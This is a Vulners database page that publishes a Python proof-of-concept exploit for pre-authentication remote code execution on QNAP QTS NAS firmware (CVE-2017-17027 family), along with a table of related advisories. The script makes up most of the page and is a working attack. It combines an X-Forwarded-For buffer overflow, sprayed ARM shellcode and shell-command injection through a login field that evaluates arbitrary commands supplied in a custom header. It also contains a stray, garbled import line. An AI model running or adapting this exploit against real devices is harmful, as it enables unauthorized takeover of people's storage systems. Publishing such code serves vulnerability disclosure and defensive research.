Vulners
Lucene search
Pre-auth Remote Code Execution exploit for QNAP QTS
| Reporter | Title | Published | Views | Family All 62 |
|---|---|---|---|---|
 | CVE-2017-17027 | 24 May 201815:44 | – | circl |
| CVE-2017-17032 | 24 May 201815:44 | – | circl |
 | QNAP QTS Buffer Overflow Vulnerability | 18 Dec 201700:00 | – | cnvd |
| QNAP QTS Buffer Overflow Vulnerability (CNVD-2017-37605) | 18 Dec 201700:00 | – | cnvd |
| QNAP QTS Buffer Overflow Vulnerability (CNVD-2017-37606) | 18 Dec 201700:00 | – | cnvd |
| QNAP QTS Buffer Overflow Vulnerability (CNVD-2017-37607) | 18 Dec 201700:00 | – | cnvd |
| QNAP QTS Buffer Overflow Vulnerability (CNVD-2017-37608) | 20 Dec 201700:00 | – | cnvd |
| QNAP QTS Buffer Overflow Vulnerability (CNVD-2017-37609) | 18 Dec 201700:00 | – | cnvd |
| QNAP QTS Buffer Overflow Vulnerability (CNVD-2017-37610) | 20 Dec 201700:00 | – | cnvd |
 | CVE-2017-17027 | 21 Dec 201715:00 | – | cve |
10
# !/usr/bin/env python
# -*- coding: iso-8859-15 -*-
#
# Pre-auth Remote Code Execution exploit for QNAP QTS
# 4.2.6 build 20171026, 4.3.3.0378 build 20171117, 4.3.4.0387 #(Beta 2) build 2017111
#
# Just a quick dirty RCE PoC to make your QNAP sing "XMAS" in morse.
#
# Author: Andrea Palazzo (@cogitoergor00t)
# E-mail: not-interested-in-chinese-spammers@seriously-dont-crawler-this.lol
# Web: https://truel.it
# Lab: https://lab.truel.it
#
# While collecting material for writing-up CVE-2017-17033 I noticed this was fixed too, so it's probably one of CVE-2017-17027 | CVE-2017-17028 | CVE-2017-17029 | CVE-2017-17030 | CVE-2017-17031 | CVE-2017-17032.
# More info: https://www.qnap.com/en/security-advisory/nas-201712-15
#
# This version has been developed against model TS-212P running QTS 4.3.3.0299, but could easily adjusted for <= 4.3.3.0378 (you'll find a little present in the comments)
#
# --------------
import sys, argparse
from non.ha import anza
try:
import requests
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
except ImportError:
print "Do you even web bro?"
sys.exit(0)
exploit_data = {
"target_endpoint": "/cgi-bin/filemanager/wfm2Login.cgi",
"payload": "pic_raw 81;pic_raw 80;pic_raw 80;pic_raw 81;sleep 1;pic_raw 81;pic_raw 81;sleep 1;pic_raw 80;pic_raw 81;sleep 1;pic_raw 80;pic_raw 80;pic_raw 80;#",
"bof": "A"*92+"\xff\x60\x66\xff"+"\x90\x60\xff", #PADDING+SP+PC
"shellcode": "\x2d\xd4\xa0\xe1" + #mov sp, sp, lsr #8
#old popen @ 22c9c
#07/07 @22e24
#28/07 @230dc
#05/09 @21e90
"\x86\x3b\xa0\xe3" + #mov r3, 0x21800
"\x69\x3e\x83\xe2" + #add r3, 0x690
"\x13\xff\x2f\xe1" #bx r3
}
def request(target, data, headers):
url = target + exploit_data['target_endpoint']
return requests.post(url, headers = headers, data = data, verify = False)
def vulnerable(target):
print ">> Checking if likely to be vulnerable"
headers = {
'User-Agent': 'Vuln tester',
'X-Forwarded-For': "A" * 200
}
try:
r = request(target, "user=admin", headers)
except:
print "Something wrong: {}".format(sys.exc_info()[0])
sys.exit()
return (r.status_code == 500)
def spray(n):
spray = ""
for i in range(n):
spray += '{}={}&'.format(exploit_data["shellcode"]*3+"\x08\x80\xa0\xe1", exploit_data["shellcode"]*3+"\x08\x80\xa0\xe1")
return spray[:-1]
def exploit(target):
print "Let's " + exploit_data['payload'] + "\n! COULD TAKE A WHILE !"
if requests.get(target + "/cgi-bin/pwn").status_code == 200:
print "... but first you need to clean up your mess, don't you?"
sys.exit()
headers = {
'W00T': exploit_data['payload'],
'X-Forwarded-For': exploit_data["bof"] #There were others, I'm sure you can figure'em out yourself if you need
}
data = spray(31337) + "&user=touch /home/httpd/cgi-bin/pwn; eval $HTTP_W00T;"
while True:
#print '.'
try:
request(target, data, headers)
if requests.get(target + "/cgi-bin/pwn").status_code == 200:
print ">> w00t :)"
break
except:
print "Something wrong: {}".format(sys.exc_info()[0])
sys.exit()
if __name__ == "__main__":
print ""
parser = argparse.ArgumentParser(description = 'Pre-auth Remote Code Execution exploit for QNAP QTS <= 4.2.6 build 20171026, 4.3.3.0378 build 20171117, 4.3.4.0387 (Beta 2) build 20171116')
parser.add_argument('-t', '--target', dest = 'http(s)://uri[:port]', required = True)
parser.add_argument('-c', '--check', help = 'No exploitation will be performed.', action = 'store_true')
args = parser.parse_args()
target = vars(args)['http(s)://uri[:port]']
print "\n------------------------------------------\n" + \
"Pre-auth Remote Code Execution exploit for \n" + \
"QNAP QTS <=\t4.2.6 build 20171026\n\t\t4.3.3.0378 build 20171117\n\t\t4.3.4.0387 build 20171116\n\t\t(Beta 2)" + \
"\n------------------------------------------\n" + \
"@cogitoergor00t\t\t https://truel.it" + \
"\n------------------------------------------\n" \
print ">> Targeting " + target
if not vulnerable(target):
print ">< Nothing to do here :("
sys.exit(0)
print ">> Probably vulnerable"
if (args.check):
print ">> See you"
else:
print ">> Gonna make this baby sing\n"
exploit(target)
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
26 Dec 2017 00:00Current
EPSS0.0731